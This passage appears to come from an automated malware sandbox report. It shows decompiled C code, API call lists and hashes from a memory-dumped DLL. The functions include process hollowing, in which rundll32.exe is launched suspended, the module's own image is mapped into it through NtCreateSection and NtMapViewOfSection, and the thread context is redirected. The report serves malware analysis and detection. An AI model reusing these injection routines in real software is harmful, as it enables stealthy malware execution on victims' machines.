                                                                                                                        0x6f334708
                                                                                                                        0x6f334709
                                                                                                                        0x6f334710
                                                                                                                        0x6f33471f
                                                                                                                        0x6f334727
                                                                                                                        0x6f33472b
                                                                                                                        0x6f334730
                                                                                                                        0x6f334730
                                                                                                                        0x6f334740
                                                                                                                        0x6f334747
                                                                                                                        0x00000000
                                                                                                                        0x6f33451b
                                                                                                                        0x6f33451b
                                                                                                                        0x6f33451b
                                                                                                                        0x6f334515
                                                                                                                        0x6f33450b

                                                                                                                        APIs
                                                                                                                        • GetPrivateProfileIntA.KERNEL32 ref: 6F3344FF
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000800,00000000), ref: 6F33454E
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F334555
                                                                                                                        • wsprintfA.USER32 ref: 6F334584
                                                                                                                        • wsprintfA.USER32 ref: 6F33459F
                                                                                                                        • wsprintfA.USER32 ref: 6F3345D3
                                                                                                                        • wsprintfA.USER32 ref: 6F3345EC
                                                                                                                        • wsprintfA.USER32 ref: 6F334619
                                                                                                                        • wsprintfA.USER32 ref: 6F334632
                                                                                                                        • wsprintfA.USER32 ref: 6F33467F
                                                                                                                        • WritePrivateProfileStringA.KERNEL32(00A55CA8,00A55CD8,00000602,00A32D38), ref: 6F3346F0
                                                                                                                        • RtlZeroMemory.NTDLL(?,0000001E), ref: 6F334710
                                                                                                                        • SHFileOperationA.SHELL32(?,?,0000001E), ref: 6F334730
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F334739
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F334740
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: wsprintf$Heap$PrivateProcessProfile$AllocFileFreeMemoryOperationStringWriteZero
                                                                                                                        • String ID: %s "%s%s%s" %s$%s %s$%s%d%c$%s%s%c$%s%s%s$.cab$.exe$.inf$install$remove$restart$vpn
                                                                                                                        • API String ID: 39017707-2794406546
                                                                                                                        • Opcode ID: d6731bb974602088898007bef38cf1fad78e3aab61831aa27a99216430704922
                                                                                                                        • Instruction ID: 0449499d11f6e2f4abee47aa19376abbf9115b9fda9b6db3c8cecfca3460325a
                                                                                                                        • Opcode Fuzzy Hash: d6731bb974602088898007bef38cf1fad78e3aab61831aa27a99216430704922
                                                                                                                        • Instruction Fuzzy Hash: CD61C5B2E043A8BBE710EF64CC45F6B77ADAF85714F01450CF954AB280EA76F4148B65
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 96%
                                                                                                                        			E6F3323B0() {
                                                                                                                        				char _v260;
                                                                                                                        				char _v268;
                                                                                                                        				char* _v272;
                                                                                                                        				struct _SECURITY_ATTRIBUTES* _v276;
                                                                                                                        				struct _SECURITY_ATTRIBUTES* _v280;
                                                                                                                        				struct _SECURITY_ATTRIBUTES* _v284;
                                                                                                                        				intOrPtr _v288;
                                                                                                                        				intOrPtr _v292;
                                                                                                                        				void* _v296;
                                                                                                                        				char _v320;
                                                                                                                        				struct HINSTANCE__* _v324;
                                                                                                                        				void _v328;
                                                                                                                        				struct HINSTANCE__* _v332;
                                                                                                                        				char _v336;
                                                                                                                        				long _v340;
                                                                                                                        				char _v344;
                                                                                                                        				CHAR* _t42;
                                                                                                                        				int _t50;
                                                                                                                        				long _t51;
                                                                                                                        				char* _t53;
                                                                                                                        				char* _t54;
                                                                                                                        				void* _t56;
                                                                                                                        				intOrPtr _t62;
                                                                                                                        				void* _t65;
                                                                                                                        				void* _t73;
                                                                                                                        				void* _t88;
                                                                                                                        				signed int _t91;
                                                                                                                        				void* _t92;
                                                                                                                        				long _t96;
                                                                                                                        				void* _t97;
                                                                                                                        
                                                                                                                        				_v328 = LoadLibraryA("msvcrt.dll");
                                                                                                                        				_v324 = LoadLibraryA("user32.dll");
                                                                                                                        				_v332 = LoadLibraryA("shlwapi.dll");
                                                                                                                        				_t42 = GetCommandLineA();
                                                                                                                        				_v340 = 0;
                                                                                                                        				_t88 = E6F33A3D0(_t42,  &_v340);
                                                                                                                        				if(_t88 == 0) {
                                                                                                                        					L24:
                                                                                                                        					FreeLibrary(_v324);
                                                                                                                        					FreeLibrary(_v332);
                                                                                                                        					FreeLibrary(_v328);
                                                                                                                        					ExitProcess(0);
                                                                                                                        				}
                                                                                                                        				if(_v340 <= 1) {
                                                                                                                        					L23:
                                                                                                                        					LocalFree(_t88);
                                                                                                                        					goto L24;
                                                                                                                        				} else {
                                                                                                                        					_t91 = 1;
                                                                                                                        					do {
                                                                                                                        						_t50 = lstrcmpiA( *(_t88 + _t91 * 4), "-svcr");
                                                                                                                        						_t51 = _v340;
                                                                                                                        						if(_t50 != 0) {
                                                                                                                        							goto L5;
                                                                                                                        						}
                                                                                                                        						_t91 = _t91 + 1;
                                                                                                                        						if(_t91 < _t51) {
                                                                                                                        							_t53 = StrRChrA( *(_t88 + _t91 * 4), 0, 0x5c);
                                                                                                                        							if(_t53 == 0) {
                                                                                                                        								break;
                                                                                                                        							}
                                                                                                                        							_t54 =  &(_t53[1]);
                                                                                                                        							if(_t54 != 0 &&  *_t54 != 0) {
                                                                                                                        								wsprintfA( &_v268, "%s%s", "pdll", _t54);
                                                                                                                        								_t56 = OpenEventA(2, 0,  &_v260);
                                                                                                                        								if(_t56 != 0) {
                                                                                                                        									CloseHandle(_t56);
                                                                                                                        									break;
                                                                                                                        								}
                                                                                                                        								_t73 = CreateEventA(0, 1, 0,  &_v260);
                                                                                                                        								_t96 = 0;
                                                                                                                        								if(_t73 != 0) {
                                                                                                                        									_push(0x3c);
                                                                                                                        									_push( &_v320);
                                                                                                                        									L6F33C2EE();
                                                                                                                        									_v344 = 0;
                                                                                                                        									_t62 = E6F332260( *(_t88 + _t91 * 4),  &_v344);
                                                                                                                        									if(_t62 != 0) {
                                                                                                                        										_v292 = _t62;
                                                                                                                        										_v288 = _v344;
                                                                                                                        										_v284 = 0;
                                                                                                                        										_v280 = 0;
                                                                                                                        										_v276 = 0;
                                                                                                                        										_v272 =  *(_t88 + _t91 * 4);
                                                                                                                        										_t92 = CreateThread(0, 0, E6F332340,  &_v328, 0, 0);
                                                                                                                        										if(_t92 != 0) {
                                                                                                                        											_t97 = E6F331D00(_v296, _v292, 0,  &_v332);
                                                                                                                        											if(_v296 != 0) {
                                                                                                                        												NtTerminateThread(_t92, 0);
                                                                                                                        												if(_t97 == 0) {
                                                                                                                        													E6F331C00( &_v336);
                                                                                                                        												}
                                                                                                                        											}
                                                                                                                        											CloseHandle(_t92);
                                                                                                                        											_t96 = 0;
                                                                                                                        										}
                                                                                                                        										_t65 = _v296;
                                                                                                                        										if(_t65 != _t96) {
                                                                                                                        											VirtualFree(_t65, _t96, 0x8000);
                                                                                                                        										}
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        								CloseHandle(_t73);
                                                                                                                        							}
                                                                                                                        							break;
                                                                                                                        						}
                                                                                                                        						L5:
                                                                                                                        						_t91 = _t91 + 1;
                                                                                                                        					} while (_t91 < _t51);
                                                                                                                        					goto L23;
                                                                                                                        				}
                                                                                                                        			}

































                                                                                                                        0x00000000
                                                                                                                        0x6f33257b
                                                                                                                        0x6f3324aa
                                                                                                                        0x6f3324ac
                                                                                                                        0x6f3324b0
                                                                                                                        0x6f3324b6
                                                                                                                        0x6f3324bc
                                                                                                                        0x6f3324bd
                                                                                                                        0x6f3324cb
                                                                                                                        0x6f3324cf
                                                                                                                        0x6f3324d9
                                                                                                                        0x6f3324e8
                                                                                                                        0x6f3324f8
                                                                                                                        0x6f3324fc
                                                                                                                        0x6f332500
                                                                                                                        0x6f332504
                                                                                                                        0x6f332508
                                                                                                                        0x6f332512
                                                                                                                        0x6f332516
                                                                                                                        0x6f332535
                                                                                                                        0x6f332537
                                                                                                                        0x6f33253c
                                                                                                                        0x6f332543
                                                                                                                        0x6f33254a
                                                                                                                        0x6f33254f
                                                                                                                        0x6f332543
                                                                                                                        0x6f332553
                                                                                                                        0x6f332559
                                                                                                                        0x6f332559
                                                                                                                        0x6f33255b
                                                                                                                        0x6f332561
                                                                                                                        0x6f33256a
                                                                                                                        0x6f33256a
                                                                                                                        0x6f332561
                                                                                                                        0x6f3324d9
                                                                                                                        0x6f332571
                                                                                                                        0x6f332577
                                                                                                                        0x00000000
                                                                                                                        0x6f332459
                                                                                                                        0x6f332438
                                                                                                                        0x6f332438
                                                                                                                        0x6f332439
                                                                                                                        0x00000000
                                                                                                                        0x6f332581

                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(msvcrt.dll), ref: 6F3323C3
                                                                                                                        • LoadLibraryA.KERNEL32(user32.dll), ref: 6F3323CE
                                                                                                                        • LoadLibraryA.KERNEL32(shlwapi.dll), ref: 6F3323D9
                                                                                                                        • GetCommandLineA.KERNEL32 ref: 6F3323DF
                                                                                                                          • Part of subcall function 6F33A3D0: lstrlenA.KERNEL32(?,?,?,?,00000000,?), ref: 6F33A3DB
                                                                                                                          • Part of subcall function 6F33A3D0: LocalAlloc.KERNEL32(00000040,00000004,?,?,?,00000000,?), ref: 6F33A3F4
                                                                                                                        • lstrcmpiA.KERNEL32(?,-svcr), ref: 6F332429
                                                                                                                        • StrRChrA.SHLWAPI(?,00000000,0000005C,?,-svcr), ref: 6F33244A
                                                                                                                        • wsprintfA.USER32 ref: 6F332478
                                                                                                                        • OpenEventA.KERNEL32(00000002,00000000,?), ref: 6F33248A
                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 6F3324A4
                                                                                                                        • RtlZeroMemory.NTDLL(?,0000003C), ref: 6F3324BD
                                                                                                                        • CreateThread.KERNEL32 ref: 6F33250C
                                                                                                                        • NtTerminateThread.NTDLL ref: 6F33253C
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6F332553
                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 6F33256A
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6F332571
                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 6F332583
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 6F332594
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 6F33259B
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 6F3325A2
                                                                                                                        • ExitProcess.KERNEL32 ref: 6F3325A6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$Free$Load$CloseCreateEventHandleLocalThread$AllocCommandExitLineMemoryOpenProcessTerminateVirtualZerolstrcmpilstrlenwsprintf
                                                                                                                        • String ID: %s%s$-svcr$msvcrt.dll$pdll$shlwapi.dll$user32.dll
                                                                                                                        • API String ID: 4122922002-3260842094
                                                                                                                        • Opcode ID: ba3dd78bd3816c3261faafbb08f3ce6c4237d4eea5135c99e6d5a31c64f96b60
                                                                                                                        • Instruction ID: 3b1e1d5bb70e5227133ba15b556a6e46b90200c1490a516523f2600940f2b47e
                                                                                                                        • Opcode Fuzzy Hash: ba3dd78bd3816c3261faafbb08f3ce6c4237d4eea5135c99e6d5a31c64f96b60
                                                                                                                        • Instruction Fuzzy Hash: E951CF73D047A9ABE710DFA8CD44F5BBBEDAB85714F00490DF95192240DB71E9108BA2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 74%
                                                                                                                        			E6F332750(CHAR* _a4) {
                                                                                                                        				intOrPtr _v552;
                                                                                                                        				struct _CONTEXT _v724;
                                                                                                                        				struct _STARTUPINFOA _v792;
                                                                                                                        				struct _PROCESS_INFORMATION _v808;
                                                                                                                        				void* _v812;
                                                                                                                        				void* _v816;
                                                                                                                        				char _t23;
                                                                                                                        				long* _t38;
                                                                                                                        				CHAR* _t51;
                                                                                                                        				void* _t52;
                                                                                                                        				void* _t55;
                                                                                                                        
                                                                                                                        				_t51 = _a4;
                                                                                                                        				_t38 = 0;
                                                                                                                        				if(GetFileAttributesA(_t51) == 0xffffffff) {
                                                                                                                        					return 0;
                                                                                                                        				} else {
                                                                                                                        					_t55 = HeapAlloc(GetProcessHeap(), 8, 0x30c);
                                                                                                                        					if(_t55 != 0) {
                                                                                                                        						_t23 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa4de08
                                                                                                                        						wsprintfA(_t55, "\"%s%s\" %s \"%s\"", _t23, "rundll32.exe", "-svcr", _t51);
                                                                                                                        						_push(0x44);
                                                                                                                        						_push( &(_v792.dwX));
                                                                                                                        						L6F33C2EE();
                                                                                                                        						_push(0x10);
                                                                                                                        						_push( &(_v808.dwProcessId));
                                                                                                                        						_v792.lpDesktop = 0x44;
                                                                                                                        						L6F33C2EE();
                                                                                                                        						if(CreateProcessA(0, _t55, 0, 0, 0, 4, 0, 0,  &_v792,  &_v808) != 0) {
                                                                                                                        							_push(_v808.hProcess);
                                                                                                                        							_t52 = E6F332640();
                                                                                                                        							if(_t52 == 0) {
                                                                                                                        								L8:
                                                                                                                        								_push(0);
                                                                                                                        								_push(_v808.hProcess);
                                                                                                                        								L6F33C30C();
                                                                                                                        							} else {
                                                                                                                        								_v724 = 0x10002;
                                                                                                                        								if(NtGetContextThread(_v808.hThread,  &_v724) < 0) {
                                                                                                                        									goto L8;
                                                                                                                        								} else {
                                                                                                                        									_v552 = E6F3323B0 - "embly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" + _t52;
                                                                                                                        									if(NtSetContextThread(_v808,  &(_v792.hStdError)) < 0 || NtResumeThread(_v812, 0) < 0) {
                                                                                                                        										goto L8;
                                                                                                                        									} else {
                                                                                                                        										_t38 = 1;
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        							CloseHandle(_v812);
                                                                                                                        							CloseHandle(_v816);
                                                                                                                        						}
                                                                                                                        						HeapFree(GetProcessHeap(), 0, _t55);
                                                                                                                        					}
                                                                                                                        					return _t38;
                                                                                                                        				}
                                                                                                                        			}















                                                                                                                        APIs
                                                                                                                        • GetFileAttributesA.KERNEL32(?,00000000,?), ref: 6F332762
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000030C,00000000,00000000), ref: 6F332780
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F332783
                                                                                                                        • wsprintfA.USER32 ref: 6F3327AA
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000044), ref: 6F3327BA
                                                                                                                        • RtlZeroMemory.NTDLL ref: 6F3327CE
                                                                                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 6F3327E6
                                                                                                                        • NtGetContextThread.NTDLL ref: 6F332819
                                                                                                                        • NtSetContextThread.NTDLL ref: 6F332840
                                                                                                                        • NtResumeThread.NTDLL ref: 6F33284F
                                                                                                                        • NtTerminateProcess.NTDLL(?,00000000), ref: 6F332866
                                                                                                                        • CloseHandle.KERNEL32(?,?,00000000,00000044), ref: 6F332876
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 6F33287D
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F332882
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F332885
                                                                                                                          • Part of subcall function 6F332640: RtlZeroMemory.NTDLL(?,00000008), ref: 6F332669
                                                                                                                          • Part of subcall function 6F332640: NtCreateSection.NTDLL ref: 6F33268B
                                                                                                                          • Part of subcall function 6F332640: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 6F3326B9
                                                                                                                          • Part of subcall function 6F332640: NtMapViewOfSection.NTDLL(08000000,00000000,0000000E,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 6F3326E2
                                                                                                                          • Part of subcall function 6F332640: RtlMoveMemory.NTDLL(?,6F330000,?), ref: 6F3326F6
                                                                                                                          • Part of subcall function 6F332640: NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 6F33272D
                                                                                                                          • Part of subcall function 6F332640: NtClose.NTDLL(?), ref: 6F332737
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapMemoryProcessSection$CloseThreadViewZero$ContextCreateHandle$AllocAttributesFileFreeMoveResumeTerminateUnmapwsprintf
                                                                                                                        • String ID: "%s%s" %s "%s"$-svcr$D$rundll32.exe
                                                                                                                        • API String ID: 4033018722-303510360
                                                                                                                        • Opcode ID: 92f4d49c012db22edef1ad7d4f11e4aa50548f4ff62a9521053413942993a488
                                                                                                                        • Instruction ID: ab8fbcfaaba371c1cfa2fd055eaa8892908f670feda343a685b42d24368fb71a
                                                                                                                        • Opcode Fuzzy Hash: 92f4d49c012db22edef1ad7d4f11e4aa50548f4ff62a9521053413942993a488
                                                                                                                        • Instruction Fuzzy Hash: B431E5B3A043A96BD310DB65CD80E6BB7DDEBC5768F00091CFA5496280C778D90987B2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 73%
                                                                                                                        			E6F334EF0(intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
                                                                                                                        				DWORD* _v0;
                                                                                                                        				signed int _v4;
                                                                                                                        				signed int _v8;
                                                                                                                        				CHAR* _v12;
                                                                                                                        				struct _STARTUPINFOA _v84;
                                                                                                                        				char _v92;
                                                                                                                        				void* _v96;
                                                                                                                        				void* _v100;
                                                                                                                        				signed int _t17;
                                                                                                                        				signed int _t23;
                                                                                                                        				long _t27;
                                                                                                                        				DWORD* _t30;
                                                                                                                        				intOrPtr _t33;
                                                                                                                        				struct _PROCESS_INFORMATION* _t44;
                                                                                                                        
                                                                                                                        				_t44 =  &_v84;
                                                                                                                        				_push(0x44);
                                                                                                                        				_push( &(_v84.dwX));
                                                                                                                        				L6F33C2EE();
                                                                                                                        				_push(0x10);
                                                                                                                        				_push( &_v92);
                                                                                                                        				L6F33C2EE();
                                                                                                                        				_t17 = _v8;
                                                                                                                        				_v84.cb = 0x44;
                                                                                                                        				if(_t17 == 0) {
                                                                                                                        					_v84.dwFlags = 1;
                                                                                                                        				}
                                                                                                                        				_t33 = _a12;
                                                                                                                        				if(_t33 != 0) {
                                                                                                                        					_v84.lpDesktop = _t33;
                                                                                                                        				}
                                                                                                                        				asm("sbb eax, eax");
                                                                                                                        				if(CreateProcessA(0, _v12, 0, 0, 0,  ~_t17 & 0x08000000, 0, _a8,  &_v84, _t44) == 0) {
                                                                                                                        					return 0;
                                                                                                                        				} else {
                                                                                                                        					_t23 = _v4;
                                                                                                                        					if(_t23 != 0) {
                                                                                                                        						if(_t23 == 0xffffffff) {
                                                                                                                        							_t27 = _t23 | 0xffffffff;
                                                                                                                        						} else {
                                                                                                                        							_t27 = _t23 * 0x3e8;
                                                                                                                        						}
                                                                                                                        						if(WaitForSingleObject(_v100, _t27) != 0) {
                                                                                                                        							if(_a4 != 0) {
                                                                                                                        								_push(0);
                                                                                                                        								_push(_v100);
                                                                                                                        								L6F33C30C();
                                                                                                                        							}
                                                                                                                        						} else {
                                                                                                                        							_t30 = _v0;
                                                                                                                        							if(_t30 != 0) {
                                                                                                                        								GetExitCodeProcess(_v100, _t30);
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					CloseHandle(_v96);
                                                                                                                        					CloseHandle(_v100);
                                                                                                                        					return 1;
                                                                                                                        				}
                                                                                                                        			}


















                                                                                                                        APIs
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000044), ref: 6F334EFA
                                                                                                                        • RtlZeroMemory.NTDLL(00000044,00000010), ref: 6F334F06
                                                                                                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?,?), ref: 6F334F56
                                                                                                                        • WaitForSingleObject.KERNEL32(?,?), ref: 6F334F7D
                                                                                                                        • GetExitCodeProcess.KERNEL32 ref: 6F334F94
                                                                                                                        • NtTerminateProcess.NTDLL(00000000,00000000), ref: 6F334FA9
                                                                                                                        • CloseHandle.KERNEL32(00000044,770CC740), ref: 6F334FBA
                                                                                                                        • CloseHandle.KERNEL32(00000044), ref: 6F334FC1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CloseHandleMemoryZero$CodeCreateExitObjectSingleTerminateWait
                                                                                                                        • String ID: D
                                                                                                                        • API String ID: 2123967418-2746444292
                                                                                                                        • Opcode ID: 1c6ec34be75abdd9849f1e6a5a3d158d07c0fbc19b670bdfa033a27e5f27ee90
                                                                                                                        • Instruction ID: 1f66655607f68f2d6858a68d12e090dfd645e0519f7c0ebd8c6f870ef632578d
                                                                                                                        • Opcode Fuzzy Hash: 1c6ec34be75abdd9849f1e6a5a3d158d07c0fbc19b670bdfa033a27e5f27ee90
                                                                                                                        • Instruction Fuzzy Hash: B9214F72A583916BE714DB64CD40F5B73EDBF84B14F144A1DB5A0C62D0D77AE804CB52
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 89%
                                                                                                                        			E6F332640() {
                                                                                                                        				char _v8;
                                                                                                                        				void* _v16;
                                                                                                                        				long _v24;
                                                                                                                        				void* _v32;
                                                                                                                        				long _v44;
                                                                                                                        				void* _v48;
                                                                                                                        				void* _v56;
                                                                                                                        				void* _v64;
                                                                                                                        				long _v80;
                                                                                                                        				void* _v88;
                                                                                                                        				void* _v92;
                                                                                                                        				void* _v120;
                                                                                                                        				intOrPtr _v132;
                                                                                                                        				void* _v136;
                                                                                                                        				void* _v140;
                                                                                                                        				void* _t45;
                                                                                                                        				void* _t58;
                                                                                                                        				intOrPtr _t59;
                                                                                                                        
                                                                                                                        				_t58 = "embly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD";
                                                                                                                        				_t1 = _t58 + 0x3c; // 0xf8
                                                                                                                        				_t59 =  *_t1;
                                                                                                                        				_t45 = 0;
                                                                                                                        				if( *((intOrPtr*)(_t59 + _t58)) == 0x4550) {
                                                                                                                        					_push(8);
                                                                                                                        					_push( &_v8);
                                                                                                                        					_v24 = 0;
                                                                                                                        					L6F33C2EE();
                                                                                                                        					_v16 =  *(_t59 + _t58 + 0x50);
                                                                                                                        					if(NtCreateSection( &_v32, 0xe, 0,  &_v16, 0x40, 0x8000000, 0) >= 0) {
                                                                                                                        						_v48 = 0;
                                                                                                                        						_v44 = 0;
                                                                                                                        						if(NtMapViewOfSection(_v56, 0xffffffff,  &_v48, 0, 0, 0,  &_v44, 2, 0, 0x40) >= 0) {
                                                                                                                        							_v88 = 0;
                                                                                                                        							if(NtMapViewOfSection(_v92, _v64,  &_v88, 0, 0, 0,  &_v80, 2, 0, 0x40) >= 0) {
                                                                                                                        								RtlMoveMemory(_v120, _t58,  *(_t59 + _t58 + 0x50));
                                                                                                                        								if(E6F3325B0(_v132, _v136) == 0) {
                                                                                                                        									NtUnmapViewOfSection(_v140, _v136);
                                                                                                                        								} else {
                                                                                                                        									_t45 = _v136;
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        							NtUnmapViewOfSection(0xffffffff, _v120);
                                                                                                                        						}
                                                                                                                        						NtClose(_v92);
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				return _t45;
                                                                                                                        			}






















                                                                                                                        APIs
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000008), ref: 6F332669
                                                                                                                        • NtCreateSection.NTDLL ref: 6F33268B
                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 6F3326B9
                                                                                                                        • NtMapViewOfSection.NTDLL(08000000,00000000,0000000E,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 6F3326E2
                                                                                                                        • RtlMoveMemory.NTDLL(?,6F330000,?), ref: 6F3326F6
